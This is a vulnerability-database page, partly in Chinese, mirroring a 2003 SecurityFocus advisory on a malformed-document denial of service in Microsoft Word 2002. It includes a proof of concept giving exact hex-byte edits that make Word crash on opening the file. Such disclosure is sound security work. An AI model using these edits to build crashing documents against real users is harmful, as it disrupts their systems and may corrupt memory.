Microsoft Word 97/98/2002 – Malformed Document Denial of Service
漏洞ID | 1054212 | 漏洞类型 | |
发布时间 | 2003-10-03 | 更新时间 | 2003-10-03 |
CVE编号 | N/A |
CNNVD-ID | N/A |
漏洞平台 | Windows | CVSS评分 | N/A |
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/8761/info
It has been reported that Microsoft Word is prone to a vulnerability that may allow an attacker to crash the software. The problem occurs when an attacker modifies the memory structure of a Word document. If a user opens the malformed document, it would cause the software to crash. This could potentially allow for corruption of memory, resulting in a possibility of arbitrary code execution, though this has not been confirmed.
1. Open Word.
2. Save .doc file.
3. Modify .doc file by using binary editor as follows:
these lines were taken from .doc file of Microsoft Word 2002(10.2627.3311):
00 00 00 00 00 a3 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 01
00 00 00 00 00 00 b4 01 00 00 20 00 00 00 9c 01 00 00 00 00 00 00 9c
01 00 00 00 00 00 00 9c 01 00 00 00 00 00 00 9c 01 00 00 00 00 00 00
-------
4. Change them as follows:
00 00 00 00 00 a3 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 01
00 00 62 62 62 62 b4 01 00 00 20 00 00 00 9c 01 00 00 00 00 00 00 9c
01 00 00 00 00 00 00 9c 01 00 00 00 00 00 00 9c 01 00 00 00 00 00 00
-------
5. Open modified .doc file.
6. Microsoft Word will crashes.
Linux kernel漏洞 漏洞ID 1205841 漏洞类型 未知 发布时间 2001-04-17 更新时间 2001-04-17 CVE编号 CVE-2001-1390 CNNVD-ID CNNVD-200104-005 漏洞平台 N/A CVSS评分 …
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
恐龙抗狼扛1年前0
kankan啊啊啊啊3年前0
66666666666666